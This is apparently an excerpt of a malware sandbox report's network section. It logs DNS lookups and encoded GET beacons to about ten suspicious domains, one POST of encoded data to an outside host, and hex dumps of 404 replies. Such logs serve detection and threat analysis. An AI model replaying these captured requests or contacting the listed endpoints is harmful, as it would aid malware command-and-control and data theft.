Source: global traffic, HTTP traffic detected: GET /lnl7/?sVC8z=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.izmirescortg.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.aballanet.cat | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.madhf.tech | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.canadavinreport.site | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /t322/?PPP=FHWL56&sVC8z=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.yunlekeji.top | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /iuvu/?sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.logidant.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /36be/?sVC8z=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.laohub10.net | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.zkdamdjj.shop | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /k1td/?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.tals.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /gn26/?sVC8z=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd7NMKGX1gMLgBVaz3e9231X82jxOqgG++QmJ2h2W7Ejj4Gw==&PPP=FHWL56 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.brightvision.website | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.izmirescortg.xyz
Source: global traffic, DNS traffic detected: DNS query: www.aballanet.cat
Source: global traffic, DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic, DNS traffic detected: DNS query: www.canadavinreport.site
Source: global traffic, DNS traffic detected: DNS query: www.yunlekeji.top
Source: global traffic, DNS traffic detected: DNS query: www.logidant.xyz
Source: global traffic, DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic, DNS traffic detected: DNS query: www.zkdamdjj.shop
Source: global traffic, DNS traffic detected: DNS query: www.tals.xyz
Source: global traffic, DNS traffic detected: DNS query: www.brightvision.website
                Source: unknownHTTP traffic detected: POST /6xrr/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 206Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.aballanet.catOrigin: http://www.aballanet.catReferer: http://www.aballanet.cat/6xrr/User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Data Raw: 73 56 43 38 7a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 68 75 31 5a 58 54 70 51 53 69 58 72 30 44 4f 58 67 33 75 44 6a 6b 45 39 41 68 70 56 55 47 75 6d 38 2b 61 71 47 59 3d Data Ascii: sVC8z=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4hu1ZXTpQSiXr0DOXg3uDjkE9AhpVUGum8+aqGY=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:08:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KScnn1MU9%2BxRfTJro3YPICHi4D1YPn%2F1oyO5KNSBtQgkqtWUsJAdU6OK%2FFelyJfisitUXQlrPBxByPwPanZG4SOeGyhWTF9oWULlFHZKn5zWfvPEZoc977ttt9Tybp3Y5%2FkUGn4%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e5b132f0d1942e7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=373&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this 
server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 39 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 
20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:20 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 20 Nov 2024 20:10:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:11:19 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 